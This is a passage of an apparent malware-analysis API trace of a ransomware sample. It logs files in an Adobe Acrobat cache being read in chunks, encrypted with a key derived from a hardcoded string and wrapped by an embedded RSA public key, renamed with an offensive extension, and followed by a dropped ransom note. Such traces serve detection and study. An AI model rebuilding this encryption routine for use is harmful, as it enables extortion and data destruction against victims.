"c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt17.lst"), bFailIfExists=0) returned 1 [0241.918] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt17.lst", dwFileAttributes=0x0) returned 1 [0241.919] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt17.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt17.lst.gsg")) returned 1 [0241.921] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt17.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt17.lst"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\AcroFnt17.lst.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\acrofnt17.lst.fuck")) returned 1 [0241.922] CryptDestroyHash (hHash=0x28e8078) returned 1 [0241.922] CryptDestroyKey (hKey=0x28e7df8) returned 1 [0241.922] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.923] FindNextFileA (in: hFindFile=0x28e82b8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0241.923] FindClose (in: hFindFile=0x28e82b8 | out: hFindFile=0x28e82b8) returned 1 [0241.923] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\readme_back_files.htm")) returned 0xffffffff [0241.923] AreFileApisANSI () returned 1 [0241.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0241.923] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0241.925] GetFileType (hFile=0x5d40) returned 0x1 [0241.925] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0241.926] FindNextFileA (in: hFindFile=0x28e7d78, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0241.927] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0241.927] GetLastError () returned 0x0 [0241.927] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr.dat")) returned 0x20 [0241.929] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr.dat", dwFileAttributes=0x80) returned 1 [0241.930] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0241.931] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0241.931] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr.dat.gsg", dwFileAttributes=0x2) returned 1 [0241.932] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f6348) returned 1 [0241.935] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0241.935] lstrlenA (lpString="cjCYuiydaGDqRLBosfDTjZpnzMlQm") returned 29 [0241.935] CryptHashData (hHash=0x28e7b38, pbData=0x2856de0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.935] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e7b38, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e7df8) returned 1 [0241.935] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.935] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0241.935] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f4a50) returned 1 [0241.936] CryptImportPublicKeyInfo (in: hCryptProv=0x28f4a50, dwCertEncodingType=0x1, pInfo=0x2935920*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935950*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935958*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e7ef8) returned 1 [0241.936] CryptEncrypt (in: hKey=0x28e7ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0241.936] CryptEncrypt (in: hKey=0x28e7ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f4258*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f4258*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0241.936] WriteFile (in: hFile=0x5d44, lpBuffer=0x28f4258*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x28f4258*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0241.937] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.947] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.947] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.953] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.954] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.954] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.954] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.954] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.954] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.954] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.954] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.954] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.954] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.954] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.954] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.957] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.957] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.957] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.957] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.957] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.957] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.958] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.958] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.958] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.958] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.958] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.958] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.958] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.958] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.958] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.959] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.959] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.959] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.959] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.959] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.959] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.959] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.959] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.959] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.959] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.959] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.959] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.959] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.960] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.960] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.960] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.960] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.960] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.960] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.960] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.960] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.960] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.960] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.960] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.961] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.961] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.961] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.961] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.961] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.961] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.961] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.961] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.961] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.961] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.961] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.961] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.962] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.962] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.962] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.962] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.962] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.962] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.962] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | 